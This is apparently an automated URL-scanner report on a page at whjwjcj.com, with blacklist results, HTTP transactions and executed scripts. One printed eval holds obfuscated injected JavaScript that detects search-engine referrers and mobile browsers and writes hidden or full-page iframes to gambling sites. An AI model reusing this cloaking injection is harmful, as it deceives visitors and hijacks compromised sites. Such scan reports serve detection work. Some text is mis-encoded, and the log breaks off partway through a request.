Overview

URL whjwjcj.com/nav/menu_dfwz.htm
IP128.1.179.64
ASN
Location United States
Report completed2019-01-22 06:19:45 CET
StatusLoading report..
urlquery Alerts No alerts detected


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Pool
Access Level


Intrusion Detection Systems

Suricata /w Emerging Threats Pro  No alerts detected


Blacklists

MDL  No alerts detected
OpenPhish  No alerts detected
PhishTank  No alerts detected
Fortinet's Web Filter
Added / Verified Severity Host Comment
2019-01-22 2 js.users.51.la/18704591.js Malware
DNS-BH  No alerts detected
mnemonic secure dns  No alerts detected


Recent reports on same IP/ASN/Domain

No other reports on IP: 128.1.179.64


Last 10 reports on ASN:

Date UQ / IDS / BL URL IP
2019-02-22 00:13:44 +0100
0 - 2 - 2 fp.unived.ac.id/wp-content/uploads/organizati (...) 103.111.53.68
2019-02-22 00:11:09 +0100
0 - 1 - 0 wishkjx3.pw/c1 34.195.144.186
2019-02-22 00:09:21 +0100
0 - 1 - 0 orthodontiste-naegelen.com/ 185.177.44.115
2019-02-22 00:08:08 +0100
0 - 0 - 2 forecast-weather.eu/company/online/thrust/fil (...) 107.189.5.37
2019-02-22 00:07:33 +0100
0 - 2 - 0 centremarceau.fr/ 54.36.126.111
2019-02-22 00:06:45 +0100
0 - 0 - 0 ilove.pass.us/sarah-portfolio/i-13G2l127533014 34.232.127.114
2019-02-22 00:06:11 +0100
0 - 1 - 0 hp1344.icu/ 151.106.51.67
2019-02-22 00:05:45 +0100
0 - 1 - 0 9.hall-silver.ga/ 193.176.85.28
2019-02-22 00:04:56 +0100
0 - 1 - 0 allowlp.top/c1 47.91.170.222
2019-02-22 00:04:32 +0100
0 - 0 - 4 donkeykings.com/ 49.51.152.105

No other reports on domain: whjwjcj.com



JavaScript

Executed Scripts (2)


Executed Evals (3)

#1 JavaScript::Eval (size: 264, repeated: 1) - SHA256: b285d257c7b7f81503d6bc79fa9c4dd655822c9e28940bdc6c01681bf1d52b50

                                        ({
    "rl": "1176*885",
    "lang": "en-US",
    "ct": "unknow",
    "pf": 1,
    "ins": 1,
    "vd": 1,
    "ce": 1,
    "cd": 24,
    "ds": "",
    "ing": 1,
    "ekc": "",
    "sid": 1548134354472,
    "tt": "0�Q�-�x�* - whjwjcj.com",
    "kw": "",
    "cu": "http://www.whjwjcj.com/nav/menu_dfwz.htm",
    "pu": ""
})
                                    

#2 JavaScript::Eval (size: 4, repeated: 2) - SHA256: 5b8d2b991d2c1f5bf78beb557d17e6650086a267e5ffd4bb6f8aaa942c570f5d

                                        ({})
                                    

#3 JavaScript::Eval (size: 5234, repeated: 1) - SHA256: c7fc88c71dc83590147ee2c021c508882057254d69cf1b4ef90d702519b6ff77

                                        var localwebsitetitle = "`" + document.title.toLowerCase();
if (localwebsitetitle.indexOf('188') > 0 || localwebsitetitle.indexOf('sports') > 0) {
    var test = 1
} else {
    var test = 2
}
var a = "ifr";
var b = "am";
var c = "ent.wr";
var regexp = /(chinaso|sogou|soso|baidu|google|youdao|yahoo|bing|yandex|ifeng|360|so|haosou|qq|sm)(\.[a-z0-9\-]+){1,2}\//ig;
var where = document.referrer;
var sUserAgent = navigator.userAgent.toLowerCase();
var bIsIphoneOs = sUserAgent.match(/iphone/i) == "iphone";
var bIsSymb = sUserAgent.match(/symbianos/i) == "symbianos";
var bIsIpad = sUserAgent.match(/ipad/i) == "ipad";
var bIsIpod = sUserAgent.match(/ipod/i) == "ipod";
var bIsAndroid = sUserAgent.match(/android/i) == "android";
var bIsCE = sUserAgent.match(/windows ce/i) == "windows ce";
var bIsWM = sUserAgent.match(/windows mobile/i) == "windows mobile";
var bIsWP = sUserAgent.match(/windows phone/i) == "windows phone";
var isBDAPP = sUserAgent.match(/baiduboxapp/i) == "baiduboxapp";
var isBDBrowser = sUserAgent.match(/baidubrowser/i) == "baidubrowser";
var wherename = "";
var isM = bIsIphoneOs || bIsSymb || bIsIpad || bIsIpod || bIsAndroid || bIsCE || bIsWM || bIsWP;
var issearch = regexp.test(where);
if (isBDAPP || isBDBrowser) {
    isM = 0
}
if (issearch) {
    if (/(baidu)(\.[a-z0-9\-]+){1,2}\//ig.test(where)) {
        wherename = 'refrom=baidu'
    } else if (/(sogou)(\.[a-z0-9\-]+){1,2}\//ig.test(where)) {
        wherename = 'refrom=sogou'
    } else if (/(soso)(\.[a-z0-9\-]+){1,2}\//ig.test(where)) {
        wherename = 'refrom=soso'
    } else if (/(so|360|haosou)(\.[a-z0-9\-]+){1,2}\//ig.test(where)) {
        wherename = 'refrom=so'
    } else if (/(bing)(\.[a-z0-9\-]+){1,2}\//ig.test(where)) {
        wherename = 'refrom=bing'
    } else if (/(google)(\.[a-z0-9\-]+){1,2}\//ig.test(where)) {
        wherename = 'refrom=google'
    } else if (/(yahoo)(\.[a-z0-9\-]+){1,2}\//ig.test(where)) {
        wherename = 'refrom=yahoo'
    } else if (/(youdao)(\.[a-z0-9\-]+){1,2}\//ig.test(where)) {
        wherename = 'refrom=youdao'
    } else if (/(qq)(\.[a-z0-9\-]+){1,2}\//ig.test(where)) {
        wherename = 'refrom=qq'
    }
}
if (issearch || isM) {
    if (test == 1) {
        var vsrc = "188bet";
        var offical = "188ѝZ";
        var frm = "<" + a + "ame frameborder=\"0\" frameborder=\"1\" style=\"width:1%;height:2px;\" marginheight=\"1\" marginwidth=\"0\" allowTransparency =\"yes\" border=\"0px\" scrolling=\"no\" height=\"2px\" width=\"1%\" src=\"/statics/bc/" + vsrc + ".html?" + wherename + "\" ></ifr" + b + "e>"
    } else {
        var vsrc = "m88";
        var offical = "GM88";
        var frm = "<" + a + "ame frameborder=\"0\" frameborder=\"1\" style=\"width:1%;height:2px;\" marginheight=\"1\" marginwidth=\"0\" allowTransparency =\"yes\" border=\"0px\" scrolling=\"no\" height=\"2px\" width=\"1%\" src=\"/statics/bc/" + vsrc + ".html?" + wherename + "\" ></ifr" + b + "e>";
        var mfrm = "<" + a + "ame frameborder=\"0\" frameborder=\"1\" style=\"width:100%;height:20000px;\" marginheight=\"1\" marginwidth=\"0\" allowTransparency =\"yes\" border=\"0px\" scrolling=\"no\" height=\"20000px\" width=\"100%\" src=\"https://www.m88lead.com/?ref=" + window.location.hostname + "&frm=iframe&" + wherename + "\" ></ifr" + b + "e>"
    }
}
if (frm) {
    if (isM && mfrm) {
        eval("do" + "cum" + c + "iteln('" + mfrm + "');")
    } else {
        eval("do" + "cum" + c + "iteln('" + frm + "');");
        document.writeln("<style>body{margin:0;padding:0;background:#E6EAEB;font-family:Arial,\'�o��\',\'�S\',sans-serif}.vgbox-box{display:none;position:relative;margin:96px auto 0;padding:180px 85px 22px;border-radius:10px 10px 0 0;background:#FFF;box-shadow:5px 9px 17px rgba(102,102,102,0.75);width:286px;color:#FFF;text-align:center}.vgbox-box p{margin:0}.vgbox-circle{position:absolute;top:-50px;left:111px}.vgbox-sec-circle{stroke-dashoffset:0;stroke-dasharray:735;transition:stroke-dashoffset 1s linear}.vgbox-sec-text{position:absolute;top:11px;left:190px;width:76px;color:#000;font-size:68px}.vgbox-sec-unit{font-size:34px}.vgbox-body{margin:35px 0}.vgbox-head{color:#242424;font-size:28px}.vgbox-concent{margin:25px 0 14px;color:#7B7B7B;font-size:18px}.vgbox-concent p{line-height:27px}.vgbox-btn{display:block;border-radius:10px;background-color:#4AB0F7;height:55px;line-height:55px;width:286px;color:#FFF;font-size:20px;text-decoration:none;letter-spacing:2px}.vgbox-btn:hover{background-color:#6BC2FF}.vgbox-footer{margin:0 auto;height:42px;width:150px}.vgbox-footer-icon{float:left}.vgbox-footer-text{float:left;border-left:2px solid #EEE;padding:3px 0 0 5px;height:40px;color:#0B85CC;font-size:12px;text-align:left}.vgbox-footer-text p{color:#7A7A7A;font-size:22px;line-height:18px}</style>");
        document.writeln("<div id=\'js-vgbox-box\' class=\'vgbox-box\'> ");
        document.writeln("<svg class=\'vgbox-circle\' width=\'234\' height=\'234\'> ");
        document.writeln(" <circle cx=\'117\' cy=\'117\' r=\'108\' fill=\'#FFF\' stroke=\'#43AEFA\' stroke-width=\'17\'></circle> ");
        document.writeln(" <circle id=\'js-sec-circle\' class=\'vgbox-sec-circle\' cx=\'117\' cy=\'117\' r=\'108\' fill=\'transparent\' stroke=\'#F4F1F1\' stroke-width=\'18\' transform=\'rotate(-90 117 117)\'></circle> ");
        document.writeln(" <text class=\'vgbox-sec-unit\' x=\'82\' y=\'172\' fill=\'#BDBDBD\'>");
        document.writeln("secs");
        document.writeln(" </text> ");
        document.writeln("</svg> ");
        document.writeln("<div id=\'js-sec-text\' class=\'vgbox-sec-text\'></div> ");
        document.writeln("<div class=\'vgbox-body\'> ");
        document.writeln(" <div id=\'js-vgbox-head\' class=\'vgbox-head\'></div> ");
        document.writeln(" <div class=\'vgbox-concent\'> ");
        document.writeln("<p>�I�</p> ");
        document.writeln("<p>��c(:�	�
                                    

Executed Writes (1)

#1 JavaScript::Write (size: 82, repeated: 1) - SHA256: 1ee93f19e15c9264b4c7948065c1f8cfcab270f1ca4cdda4fd0842c8c088ab5e

                                        < script type = "text/javascript"
src = "https://js.users.51.la/18704591.js" > < /script>
                                    


HTTP Transactions (25)


Request Response
                                        
                                            GET /nav/menu_dfwz.htm HTTP/1.1 
Host: whjwjcj.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         128.1.179.64
HTTP/1.1 301 Moved Permanently
Content-Type: text/html
                                        
Server: nginx/1.0.15
Date: Tue, 22 Jan 2019 05:22:29 GMT
Content-Length: 185
Connection: keep-alive
Location: http://www.whjwjcj.com/nav/menu_dfwz.htm
Expires: Thu, 24 Jan 2019 05:22:29 GMT
Cache-Control: max-age=172800


--- Additional Info ---
Magic:  HTML document text
Size:   185
Md5:    78fa7f319099994103f2cd37a2ac09aa
Sha1:   993e669ed3b2c062758db9c8eea25aeae944c869
Sha256: 0a04a6ec690187b0fb89041c35af0b23a87526085859e8d97a6b5be4abb247ea
                                        
                                            GET /nav/menu_dfwz.htm HTTP/1.1 
Host: www.whjwjcj.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         128.1.179.64
HTTP/1.1 200 OK
Content-Type: text/html
                                        
Server: nginx/1.0.15
Date: Tue, 22 Jan 2019 05:22:30 GMT
Content-Length: 19525
Last-Modified: Mon, 03 Dec 2018 22:03:37 GMT
Connection: keep-alive
Etag: 4c455c05a839
Expires: Thu, 24 Jan 2019 05:22:30 GMT
Cache-Control: max-age=172800
Accept-Ranges: bytes


--- Additional Info ---
Magic:  HTML document text\012 exported SGML document text
Size:   19525
Md5:    5bb267f1e1ae614f682147c8644d6503
Sha1:   75edec37869dfa3c552e6021622ebd85a2352678
Sha256: aa13016f1f191bd0bfe9aebc54da1a3572c1ddd40fcb9caa088c22cf7e5e3498
                                        
                                            GET /statics/bc/e1q.js HTTP/1.1 
Host: www.whjwjcj.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.whjwjcj.com/nav/menu_dfwz.htm

                                         
                                         128.1.179.64
HTTP/1.1 200 OK
Content-Type: application/x-javascript
                                        
Server: nginx/1.0.15
Date: Tue, 22 Jan 2019 05:22:30 GMT
Content-Length: 6721
Last-Modified: Mon, 21 Jan 2019 02:48:29 GMT
Connection: keep-alive
Etag: 1a415c4532fd
Expires: Thu, 24 Jan 2019 05:22:30 GMT
Cache-Control: max-age=172800
Accept-Ranges: bytes


--- Additional Info ---
Magic:  UTF-8 Unicode text, with very long lines, with no line terminators
Size:   6721
Md5:    474a3f55b5f08ceec6b3475485888292
Sha1:   a7a724f36958ba6a5427f2675995c9d75cc64e90
Sha256: cad135a8c162ffee45327439878a10fcb563e8455a7280242be025d97d33ab16
                                        
                                            GET /nav/css/reset-common927.css HTTP/1.1 
Host: www.whjwjcj.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.whjwjcj.com/nav/menu_dfwz.htm

                                         
                                         128.1.179.64
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx/1.0.15
Date: Tue, 22 Jan 2019 05:22:30 GMT
Content-Length: 923
Last-Modified: Wed, 13 Jun 2018 10:41:21 GMT
Connection: keep-alive
Etag: 39b5b20f4d1
Expires: Thu, 24 Jan 2019 05:22:30 GMT
Cache-Control: max-age=172800
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines, with no line terminators
Size:   923
Md5:    ae137b636cb11272c3303a765c301487
Sha1:   b9fc8e0da3170be3d50497c76cd8eaef1eed5f73
Sha256: 47c3219c0e7df737c6237a2b3929742f212b3646d2852ea73b41d87526ce882e
                                        
                                            GET /nav/css/common-baidu_search0927.css?v=1109 HTTP/1.1 
Host: www.whjwjcj.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.whjwjcj.com/nav/menu_dfwz.htm

                                         
                                         128.1.179.64
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx/1.0.15
Date: Tue, 22 Jan 2019 05:22:30 GMT
Content-Length: 3852
Last-Modified: Tue, 12 Jun 2018 15:40:11 GMT
Connection: keep-alive
Etag: f0c5b1fe95b
Expires: Thu, 24 Jan 2019 05:22:30 GMT
Cache-Control: max-age=172800
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines, with CRLF line terminators
Size:   3852
Md5:    dc210204e773b3feab6eea0719ff222b
Sha1:   3c084a5730274ddb2fc3e087eeb4b9f694a4c1dc
Sha256: 815e5cfd40914f126d6af7f585e960073d3741acaddbea67779846311e206c63
                                        
                                            GET /nav/css/sug.css HTTP/1.1 
Host: www.whjwjcj.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.whjwjcj.com/nav/menu_dfwz.htm

                                         
                                         128.1.179.64
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx/1.0.15
Date: Tue, 22 Jan 2019 05:22:30 GMT
Content-Length: 932
Last-Modified: Tue, 12 Jun 2018 15:40:12 GMT
Connection: keep-alive
Etag: 3a45b1fe95c
Expires: Thu, 24 Jan 2019 05:22:30 GMT
Cache-Control: max-age=172800
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   932
Md5:    c4e2801c89c8c75a3d5e611468812894
Sha1:   c72ae1f80ffb85a65c771f0b7acfb817a133fea2
Sha256: ebe670558a302776d908c8bf47aae001469693dc75f876660396990be38e1244
                                        
                                            GET /nav/css/text_common-content_mouseoverout0927.css HTTP/1.1 
Host: www.whjwjcj.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.whjwjcj.com/nav/menu_dfwz.htm

                                         
                                         128.1.179.64
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx/1.0.15
Date: Tue, 22 Jan 2019 05:22:30 GMT
Content-Length: 1550
Last-Modified: Tue, 12 Jun 2018 15:40:13 GMT
Connection: keep-alive
Etag: 60e5b1fe95d
Expires: Thu, 24 Jan 2019 05:22:30 GMT
Cache-Control: max-age=172800
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines, with CRLF line terminators
Size:   1550
Md5:    30e452159a0d1dc6891d93f17f0faa94
Sha1:   d07a80a79a3f21b957c1f86e8ceebaf255f59f5a
Sha256: ba2f48a9172ca1c91ebdffb276b0e2884d11f1912e5fcbcc21a0098d4a88385b
                                        
                                            GET /nav/images/map.png HTTP/1.1 
Host: www.whjwjcj.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.whjwjcj.com/nav/menu_dfwz.htm

                                         
                                         128.1.179.64
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Server: nginx/1.0.15
Date: Tue, 22 Jan 2019 05:22:30 GMT
Content-Length: 12441
Last-Modified: Mon, 05 Nov 2018 13:26:44 GMT
Connection: keep-alive
Etag: 30995be04514
Expires: Thu, 24 Jan 2019 05:22:30 GMT
Cache-Control: max-age=172800
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image, 496 x 415, 8-bit colormap, non-interlaced
Size:   12441
Md5:    fd94444607c3eadf7f7878350d216782
Sha1:   65f3316759886d4b556d16c205e723215f25db26
Sha256: ac3139f8c6fc055df10f62e4f15a0428bdae36bf4f7d11f9acdb89a12349d47d
                                        
                                            GET /nav/css/extra.css HTTP/1.1 
Host: www.whjwjcj.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.whjwjcj.com/nav/menu_dfwz.htm

                                         
                                         128.1.179.64
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx/1.0.15
Date: Tue, 22 Jan 2019 05:22:30 GMT
Content-Length: 16648
Last-Modified: Tue, 12 Jun 2018 15:40:14 GMT
Connection: keep-alive
Etag: 41085b1fe95e
Expires: Thu, 24 Jan 2019 05:22:30 GMT
Cache-Control: max-age=172800
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   16648
Md5:    b65a83390555b53636ea145ced4f7d20
Sha1:   9c35c84542c7fd602568cf035dbd9b53ddb0f05b
Sha256: e4294c1a64d8dc01dc938343e97d664b1f72ad2273fe8f0ff51df1948c35647a
                                        
                                            GET /nav/favicon.ico HTTP/1.1 
Host: www.whjwjcj.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         128.1.179.64
HTTP/1.1 200 OK
Content-Type: image/x-icon
                                        
Server: nginx/1.0.15
Date: Tue, 22 Jan 2019 05:22:30 GMT
Content-Length: 1150
Last-Modified: Wed, 04 Jul 2018 22:39:12 GMT
Connection: keep-alive
Etag: 47e5b3d4c90
Expires: Thu, 24 Jan 2019 05:22:30 GMT
Cache-Control: max-age=172800
Accept-Ranges: bytes


--- Additional Info ---
Magic:  MS Windows icon resource - 1 icon
Size:   1150
Md5:    82bbb3341f7664d9756d6f7489bbf20f
Sha1:   4f63f6ed84bffa49764adbeaaee6af7dba7da999
Sha256: 8795c80b0540a672ff04ae0710a68bff4dcda57313f1ab3d4ecd5484a304dfdc
                                        
                                            POST /gsdomainvalsha2g2 HTTP/1.1 
Host: ocsp2.globalsign.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 111
Content-Type: application/ocsp-request

                                         
                                         104.18.20.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Tue, 22 Jan 2019 05:19:14 GMT
Content-Length: 1558
Connection: keep-alive
Set-Cookie: __cfduid=dcf362d23ce56d516dde26e491764eb8a1548134354; expires=Wed, 22-Jan-20 05:19:14 GMT; path=/; domain=.globalsign.com; HttpOnly
Last-Modified: Tue, 22 Jan 2019 02:39:57 GMT
Expires: Sat, 26 Jan 2019 02:39:57 GMT
Etag: "d5967165f22b07b9bd92fc0adc805b0363b14879"
Cache-Control: public, no-transform, must-revalidate, s-maxage=3600
CF-Cache-Status: HIT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 49cf9081b6b64279-OSL


--- Additional Info ---
Magic:  data
Size:   1558
Md5:    6a9b65e6823f557cbdce1e3fb410a499
Sha1:   d5967165f22b07b9bd92fc0adc805b0363b14879
Sha256: ef6d377d07e6e0afb2fb8a49a16f217adc56f260b6025362632a20392a07c480
                                        
                                            GET /18704591.js HTTP/1.1 
Host: js.users.51.la
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.whjwjcj.com/nav/menu_dfwz.htm

                                         
                                         157.185.172.184
HTTP/1.1 200 OK
Content-Type: application/javascript;charset=UTF-8
                                        
Date: Tue, 22 Jan 2019 05:19:14 GMT
Content-Length: 4898
Connection: keep-alive
Server: nginx/1.14.0
id-2: 32AAAQAAEAABAAAQAAEAABAAAQAAEAABCSmXhiuQ+XKKGqJ5QgmBS3J4Bj7QkgXY
Etag: "243fc99ea522a929edd4597e6ade7596"
x-id: 18704591
version-id: G00111654160345EFFFF900B00732B0A
Last-Modified: Thu Aug 16 14:15:48 CST 2018
request-id: 000001686F5038B290061943C7AA7BA7
x-reserved: amazon, aws and amazon web services are trademarks or registered trademarks of Amazon Technologies, Inc
Content-Disposition: inline;filename=f.txt
Age: 78599
X-Via: 1.1 am69:3 (Cdn Cache Server V2.0)[287 200 2], 1.1 PSmgytldATL1xk138:5 (Cdn Cache Server V2.0)[0 200 0]


--- Additional Info ---
Magic:  ASCII text, with very long lines, with no line terminators
Size:   4898
Md5:    243fc99ea522a929edd4597e6ade7596
Sha1:   502c286726803536511de0a6ba1f0bb6406c778a
Sha256: 765f4b0e533f725a6efd4b707ff658627b095cca619458958964640acb9d51b2

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /nav/js/tj.js HTTP/1.1 
Host: www.whjwjcj.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.whjwjcj.com/nav/menu_dfwz.htm
Cookie: __tins__18704591=%7B%22sid%22%3A%201548134354472%2C%20%22vd%22%3A%201%2C%20%22expires%22%3A%201548136154472%7D; __51cke__=; __51laig__=1

                                         
                                         128.1.179.64
HTTP/1.1 404 Not Found
Content-Type: text/html
                                        
Server: nginx/1.0.15
Date: Tue, 22 Jan 2019 05:22:32 GMT
Content-Length: 169
Connection: keep-alive


--- Additional Info ---
Magic:  HTML document text
Size:   169
Md5:    a747ce5c6864a588f55e258d2759266a
Sha1:   73fcf6fd623164a1751a2ab5fa8fc7e68286c5d4
Sha256: e7ac360d9ce9dc430864bfe59066250d5d5d510a96c15bd205ac8975bf40a4eb
                                        
                                            GET /nav/images/base_sprite.png HTTP/1.1 
Host: www.whjwjcj.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.whjwjcj.com/nav/css/common-baidu_search0927.css?v=1109
Cookie: __tins__18704591=%7B%22sid%22%3A%201548134354472%2C%20%22vd%22%3A%201%2C%20%22expires%22%3A%201548136154472%7D; __51cke__=; __51laig__=1

                                         
                                         128.1.179.64
HTTP/1.1 404 Not Found
Content-Type: text/html
                                        
Server: nginx/1.0.15
Date: Tue, 22 Jan 2019 05:22:32 GMT
Content-Length: 169
Connection: keep-alive


--- Additional Info ---
Magic:  HTML document text
Size:   169
Md5:    a747ce5c6864a588f55e258d2759266a
Sha1:   73fcf6fd623164a1751a2ab5fa8fc7e68286c5d4
Sha256: e7ac360d9ce9dc430864bfe59066250d5d5d510a96c15bd205ac8975bf40a4eb
                                        
                                            GET /nav/images/logo4.gif HTTP/1.1 
Host: www.whjwjcj.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.whjwjcj.com/nav/css/common-baidu_search0927.css?v=1109
Cookie: __tins__18704591=%7B%22sid%22%3A%201548134354472%2C%20%22vd%22%3A%201%2C%20%22expires%22%3A%201548136154472%7D; __51cke__=; __51laig__=1

                                         
                                         128.1.179.64
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: nginx/1.0.15
Date: Tue, 22 Jan 2019 05:22:32 GMT
Content-Length: 3056
Last-Modified: Wed, 04 Jul 2018 16:01:37 GMT
Connection: keep-alive
Etag: bf05b3cef61
Expires: Thu, 24 Jan 2019 05:22:32 GMT
Cache-Control: max-age=172800
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 118 x 60
Size:   3056
Md5:    657bf8c4a26d5ad629d29a150f79b722
Sha1:   3ab8e259e21db712103e21fc9604301d448ed999
Sha256: 514d8991f758204e0688baccd8c14e7df904331aeb1fb41c8dfe0859d8247c78
                                        
                                            GET /nav/images/shadow.png HTTP/1.1 
Host: www.whjwjcj.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.whjwjcj.com/nav/css/text_common-content_mouseoverout0927.css
Cookie: __tins__18704591=%7B%22sid%22%3A%201548134354472%2C%20%22vd%22%3A%201%2C%20%22expires%22%3A%201548136154472%7D; __51cke__=; __51laig__=1

                                         
                                         128.1.179.64
HTTP/1.1 404 Not Found
Content-Type: text/html
                                        
Server: nginx/1.0.15
Date: Tue, 22 Jan 2019 05:22:32 GMT
Content-Length: 169
Connection: keep-alive


--- Additional Info ---
Magic:  HTML document text
Size:   169
Md5:    a747ce5c6864a588f55e258d2759266a
Sha1:   73fcf6fd623164a1751a2ab5fa8fc7e68286c5d4
Sha256: e7ac360d9ce9dc430864bfe59066250d5d5d510a96c15bd205ac8975bf40a4eb
                                        
                                            GET /nav/images/erji/logo/menu_dfwz.png HTTP/1.1 
Host: www.whjwjcj.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
